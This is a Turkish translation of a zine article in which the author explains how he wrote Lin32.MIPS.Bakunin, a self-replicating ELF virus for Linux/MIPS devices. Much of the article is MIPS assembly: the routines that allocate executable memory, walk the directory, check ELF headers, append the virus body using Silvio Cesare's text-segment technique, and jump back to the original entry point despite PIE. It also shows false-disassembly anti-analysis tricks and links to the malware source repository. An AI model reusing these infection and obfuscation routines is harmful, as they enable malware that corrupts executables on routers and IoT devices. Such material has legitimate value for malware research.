┌───────────────────────┐
                              ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄    │
                              │ █  █ █ █ █  █    │
                              │ █  █ █ █ █▀▀▀▀    │
                              │ █  █  █ █   ▄   │
                              │         ▄▄▄▄▄ │
                              │         █  █ │
                              │         █  █ │
                              │         █▄▄▄█ │
                              │         ▄  ▄ │
                              │         █  █ │
                              │         █  █ │
                              │         █▄▄▄█ │
                              │         ▄▄▄▄▄ │
                              │          █  │
Writing Viruses In MIPS Assembly For Fun (And No Profit)  │          █  │
~ S01den                          └───────────────────█ ──┘

[ Çeviri @batcain tarafından yapılmıştır ]

tmp.out ekibinden S01den tarafından sevgiyle !
01/2021

+----------- İletişim -----------+
| twitter: @s01den        |
| mail: S01den@protonmail.com  |
+--------------------------------+

.---\ Giriş /---.
 
Bu kısa(?) yazıda, sizlere Linux/MIPS sistemleri (modemler, Iot cihazlar, oyun konsolları vb.)
hedef alan ve saf MIPS assembly ile yazdığım Lin32.MIPS.Bakunin[0] zararlısını nasıl yazdığımı
anlatıyor olacağım. Anlaşıldığı üzere yazdığım bu virüsü yaymadım ve yaymayacağım. 
Sizler de yayma aptallığını göstermeyin.

Geliştirmek istediğim eğlenceli tekniklerden birkaç tanesini, PIE varlığına rağmen zararlının
asıl giriş noktasını (OEP) hesaplatmak ya da virüsün asıl kodlarını karmaşıklaştırıp dizilimleri
ve konumları birkaç byte değiştirerek mahvetmek gibi, başka birçok sürprizle beraber kullandım.

Herhangi bir şeye değinmeden önce Bakunin zararlısının özelliklerini özetleyelim:

- Silvio Cesare'ye ait text dosyalarına bulaşma tekniği[1] sağolsun, bulunulan dizindeki bütün
 ELF dosyalarını PIE olsun ya da olmasın enfekte etme 
 (dosyaların text segmentinin tanımını virüsün kodu ile değiştimeyi sağlıyor)
- Basit ancak güçlü bir tersine mühendisliği zorlaştırma tekniği olarak "false-disassembly[2]" kullanımı
- Ekrana "X_X" bastırma (Görebileceğiniz üzere epey başarılı bir payload)
- Bakunin muazzam bir anarşist filozof idi. (Bu değil, gerçeği)

Sizi heyecanlandırdığımıza göre artık Lin32.MIPS.Bakunin kaynak kodunu detaylıca inceleyebiliriz!

.---\ false-disassembly Tekniğinin İmplementasyonu  /---.
   \    MIPS assembly: Girişin Kodlanması    /

Başlamadan önce kısaca false-disassembly tekniğini açıklamak istiyorum. Bu tersine mühendislik
karşıtı teknik basitçe ilk birkaç byte değerinin üzerine yazarak byte sıralamalarını ve 
yerlerini değiştirmek olarak açıklanabilir. Disassembler söz konusu yeni byte değerlerini
yeniden yorumlarken instruction değerlerinin başındaki "hayalet" byte dizilerinden yola
çıkacağından, byte değerleri eklendikten sonra disassemble edilmiş kodlar oldukça absürt görünecektir.

Örnek olarak aşağıdaki kod parçası verilebilir. (benim yazdığım virüse ait değil)

-------------------- cut-here --------------------

             jmp hey+2 # hayalet byte değerlerinin üstünden atlanan kısım
hey:           hey:
  xor %rbx, %rbx       .ascii "\x48\x31"
  jmp yo      ====>   xor %rbx, %rbx
                jmp yo
---------------------------------------------------

Şayet verilen örnek doğrultusunda false-disassembly uygulanmış ve uygulanmamış kodları 
karşılaştıracak olursak aşağıdaki kod blokları görülmektedir. (radare2 ftw):

-------------------- cut-here --------------------
;-- hey:
0x00401002   4831db     xor rbx, rbx
0x00401005   eb02      jmp 0x401009
             ||
             \/
;-- hey:
0x00401002   48314831    xor qword [rax + 0x31], rcx
0x00401006   dbeb      fucomi st(3)
0x00401008   026631     add ah, byte [rsi + 0x31]
 ---------------------------------------------------

Bahsettiğimiz tersine mühendislik karşıtı teknik, MIPS mimarisi göz önüne alındığında oldukça 
kullanışlı bir tekniktir. Çünkü MIPS mimarisinde kullanılan instruction değerlerinin byte 
uzunlukları sabit olmakla beraber 4 byte uzunluğundadır. Dolayısıyla insruction adresleri
dördün katları olarak hizalanmak zorundadır. 

(adresler 0x0, 0x4, 0x8 ya da 0xc değerleriyle sonlanmaktadır)

Sonuç olarak, hayalet byte değerleri olarak anlamlı değerler seçmesek dahi istediğimiz byte
değerlerini hayalet byte değerleri olarak koyabiliriz çünkü byte hizalaması ne koyarsak koyalım bozulmuş olacak:

0x004000b3          unaligned
0x004000b4   fc004003    invalid
0x004000b8   a0182523    sb t8, 0x2523(zero)
0x004000bc   bdf00003    cache 0x10, 3(t7)
0x004000c0   a0202524    sb zero, 0x2524(at)
0x004000c4   0500ff24    bltz t0, 0x3ffd58
0x004000c8   02106b00    invalid
0x004000cc   00000c03    sra at, zero, 0x10
0x004000d0   a0202524    sb zero, 0x2524(at)
0x004000d4   05000024    bltz t0, 0x400168
         ...
Gördüğünüz üzere sonuç sadece çöp :)

Ne yazık ki, yukarıda da açıkladığım üzere MIPS mimarisinde kafamıza esen her adrese "atlayamıyoruz"; 
hizalama dolayısıyla yalnızca dördün katları olan adreslere atlamak zorundayız. Bu nedenden dolayı
yazacağım virüsü giriş ve gövde olarak iki parçada ele almaya karar verdim.


Kodun giriş kısmında program akışına devam edebilmek için, hizalanmamış vaziyette duran, gövde diye adlandırdığımız kodu
çalıştırılabilir bir alana kopyalayacağız.(arkasından gelen .get_vx rutini sağolsun)
Başka bir deyişle, hizası bozuk olan instruction'ların hizasını düzeltip devam edeceğiz.

--= mmap2 sistem çağrısını çağırma =--
 # Registerlara dörtten fazla argümanı ($a0...$a3) nasıl vereceğimi bilmiyordum
 # bu yüzden ben de mmap() çağrısını kullanan basit bir program yazdığım
 # sonrasında bu programı statik link kullanıp oluşturdum ve 
 # mmap çağrısının nasıl çağrıldığını görmek için assembly kodlarını inceledim, 
 # böylece aşağıda gördüğünüz üç satırlık kodu elde ettim

 sw $zero,20($sp)
 li $v0,0
 sw $v0,16($sp)

 li $a0, 0
 li $a1, 0x6a8 # virüsün boyutu
 li $a2, 7  # PROT_READ|PROT_WRITE|PROT_EXEC
 li $a3, 0x0802 # MAP_ANONYMOUS | MAP_PRIVATE
 li $v0, 4210 # sys_mmap2
 syscall
------------------------------

Yukarıdaki assembly kodu şu çağrıyı temsil ediyor:

 mmap2(NULL, 0x6a8, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);

Hafızada alan ayrıldıktan sonra, virüsün gövdesi için yazdığımız kodları(false-disassembly tekniğini uyguladıktan sonra) kopyalıyoruz. 

--= Virüs gövdesini kopyalama =--
 bgezal $zero, get_pc # Direkt instruction adreslerine erişip koda ulaşıyoruz
            # 
 add $t1, $t1, 0x6f  # 0x6f = gövdeye kadar olan byte sayısı
            # $t1 gövde adresini içeriyor 
 move $t2, $v0     # $t2 mmap ile ayarladığımız hafızanın adresini tutuyor 
 li $t0, 0       # $t0 ise sayacımız olacak

 .get_vx:
  lb $t3, 0($t1)   # teker teker aldığımız byte değeri $t3 üzerinde tutuluyor
  sb $t3, 0($t2)   # sonrasında bu byte değerini $t2 üzerinde tuttuğumuz 
            # adrese yazıyoruz
  addi $t0, $t0, 1
  addi $t1, $t1, 1
  addi $t2, $t2, 1
  blt $t0, 0x615, .get_vx # gövde 0x615 bayttan oluşuyor

  jal $v0         # mmap ile ayrılan bölgeye atlayan kod satırı
  beq $zero, $zero, eof  # gövde payloadımızı çalıştırdıktan sonra bu satıra dönecek

 get_pc: # $t1 register üzerinde kaydedilen eip (MIPS mimarisinde pc deniyor) 
     # değerine döndüğümüz kısım
  move $t1, $ra
  jr $ra
---------------------------------

not: "beq" ya da "bgezal" gibi instruction'ları göreli atlamaları 
(diğer türlü zararlı kodumuzu çalıştıramazdık) yapmak amacıyla virüslerde kullanıyoruz. 
Klasik atlama komutları (j ya da jal gibi) mutlak adrese göre çalışıyor olmaları nedeniyle
gerçekleştirmek istediğimiz operasyon için uygun değil.

Virüsümüzün giriş kısmının sonu yalnızca sys_exit sistem çağrısından, 9 tane instruction'a 
(eof rutini bulaşma aşamasından sonra yeniden yazılacak çünkü PIE olmasına rağmen OEP adresinin hesaplanması gerekiyor)
yer açmak için koyduğumuz tampon bölgeden ve gövdedeki sıralamayı bozmak için koyduğumuz hayalet
byte değerlerinden (.ascii "\xeb\x01\xe8") oluşuyor. 

.---\ Bütün dizine zararlı bulaştırma: Gövdenin kodlanması /---.

Artık gövdeyi yazdığımız kısma geldiğimize göre, klasik virüs işlemlerini yapabiliriz.

Başka çalıştırılabilir dosyaları bulaştırmak için virüsümüzün bulunduğu dizindeki potansiyel enfekte edilebilir dosyaları tespit etmesi gerekiyor.

Bulunduğumuz dizinin adını sys_getcwd çağrısı ile elde etmemizin ardından sys_open çağrısı ile dizini açabiliriz. 

Dizini açtıktan sonra, dizin içerisindeki dosyaların adını içeren yapıyı elde etmek için sys_getdents64 çağrısını kullanıyoruz.

Elde ettiğimiz dosya yapısını ise aşağıdaki kod ile işleyebiliriz.

--= "dirent" yaspısının işlenmesi =--
li $s0, 0 # s0 sayacımız olacak
parse_dir:
 move $s2, $sp # s2 dosya adının adresini barındıracak
 addi $s2, $s2, 0x13 # d_name

 li $t1, 0
 addi $t1, $sp, 0x12
 lb $t1, 0($t1) # t1 artık dosya/dizin tipini tutuyor

 bgezal $zero, infect
 li $t9, 0

 # get d_reclen (dirent64 yapısının işleyişini inceleyin...)
 addi $t9, $sp, 0x10
 lb $t0, 1($t9)

 # buffer position += d_reclen
 add $s0, $s0, $t0

 add $sp, $sp, $t0

 blt $s0, $s1, parse_dir # eğer sayaç < dosya/dizin sayısı : jmp to parse_dir
------------------------------------

Sonrasında, bulunduğumuz dizindeki her bir dosyayı mmap çağrısı ile aşağıdaki şekilde açıyoruz:

mmap2(NULL, len_file, PROT_WRITE|PROT_EXEC, MAP_SHARED, fd, 0)

ardından bu dosyaların virüsümüzü barındırıp barındıramayacağını kontrol ediyoruz:

--= B4zı kontroller =--
# $s5 mmap çağrısıyla ayrılan alanın adresini barındırıyor

.check_magic:
 lw $t0, 0($s5)
 li $t1, 0x7f454c46 # dosyanın ELF olup olmadığını kontrol et (magic byte kontrolü ile)
 bne $t0, $t1, end

.check_bits:
 lb $t0, 4($s5)
 bne $t0, 1, end # burada e_ident[EI_CLASS] değerini kontrol ediyoruz, 
         # Bu sayede enfekte etmeye çalıştığımız ELF dosyasının 32/64 bit 
         # olup olmadığını kontrol ediyoruz (eğer 64 bit ise, goto end)

.check_signature:
 lw $t0, 9($s5) # imza e_hdr.padding yapısında bulunuyor, Lin64.Kropotkine[3]
         # yapısında olduğu gibi
 beq $t0, 0xdeadc0de, end
----------------------

Bütün bu kontroller sonucunda hala programı sona yönlendirmemişsek artık dosyayı enfekte edebiliriz. 
Bu işlem için silvio'nun bulaştırma tekniğini kullanıyoruz:

".text segmentinin sonuna kod eklemek için aşağıdaki işlemlerin yapılması gerekmektedir."
  * ELF başlıklarına yeni kod eklenebilmesi için p_shoff'un artırılması
  * Program başlıklarında text segmentinin bulunması
   * Eklenecek kod için p_filesz değerinin artırılması
   * Eklenecek kod için p_memsz değerinin artırılması
  * Kodun eklenmesinin ardından her phdr alanı için (text segmenti):
   * Yeni konumu yansıtmak için kodun eklenmesinin ardından p_offset değerinin artırılması
  * Kodun eklenmesinin ardından her section için shdr değeri için:
   * Yeni kod için sh_offset değerinin artırılması
  * Fiziksel olarak yeni kodun dosyaya eklenmesi - text segmenti p_offset
   + p_filesz (orijinal)"[1] 

Enfeksiyon işleminin oldukça uzun olması nedeniyle oldukça yorum satırı eklediğimi düşünüyorum,
dolayısıyla kodumu burada satır satır açıklamayacağım.

Öncelikle virüsün giriş kısmının yazılması gerektiği aklınızda bulunsun. 
Çünkü mmapp ile ayrılmış alanda çalışırken, giriş kısmını gövde için yaptığımız gibi dışarıdan
yerleştiremiyoruz(çünkü giriş kısmı mmap ile ayrılan alanda bulunmuyor), dolayısıyla ben de bu kısımları elle yazdım. 

Elle yazılmış giriş kısmınıı kopyaladıktan sonra, OEP noktasını hesaplattığım kodu (yine elle) yazdım.
Lin64.Kropotkine[3] için kullandığım methodun aynını kullandım. (ELF_master'ın PIE[4]'e rağmen OEP noktasını hesapladığı teknik)

Bu teknik temelde aşağıdaki operasyonu gerçekleştiriyor:

 get_rip() - number_of_bytes_before - new_EP + original-e_hdr.entry

Yukarıda verilen hesabı yapmak için kullanılan MIPS kodu:


TODO: Buradan tam emin olamadım
------------------- elle yazılacak kod -------------------
 0411fff5    bal get_pc
 00000000    nop
 2129fc70    addi t1, t1, -0x74 # bu instruction'dan öncesindeki 
                  # byte sayısını çıkart
 3401dead    ori at, zero, new_EP
 01214822    sub t1, t1, at
 2129beef    addi t1, t1, OEP
 0060e825    move sp, v1    # stack'i eski haline getir
 01200008    jr t1       # Hesaplanan OEP noktasına atla
------------------------------------------------------------

Bütün bu işlemlerin ardından gövdeyi dosyaya koyup değişiklikleri kaydedebilir 
(sys_msync ve sys_munmap çağrıları aracılığıyla) ve başka bir dosyayı enfekte etmek üzere sonunda dosyayı kapatabiliriz. 

Bütün dizini enfekte ettikten sonra, yalnızca ("X_X") payloadını çalıştırıp çıkış yapıyoruz!

.---\ Sonuç /---.

Umarım bu yazıyı beğenmişsinizdir! Çünkü ben bu virüsü yazarken çok şey öğrendim, daha önce MIPS mimarisi üzerine hiçbir şey yazmamıştım.

Aynı zamanda umuyorum ki siz de en az benim iki ay boyunca bu virüs üzerinde çalışırken öğrendiklerim kadar bir şeyler öğrenebilmişsinizdir.

.---\ Notlar ve Referanslar /---.
[0] Kaynak kodun yeri 
[1] Silvio'nun enfeksiyon üzerine yazdığı yazı 
  http://ivanlef0u.fr/repo/madchat/vxdevl/vdat/tuunix02.htm
[2] http://www.ouah.org/linux-anti-debugging.txt
[3] https://github.com/vxunderground/MalwareSourceCode
   /blob/main/VXUG/Linux.Kropotkine.asm
[4] https://bitlackeys.org/papers/pocorgtfo20.pdf

--- Source ---

- Linux.Bak0unin.asm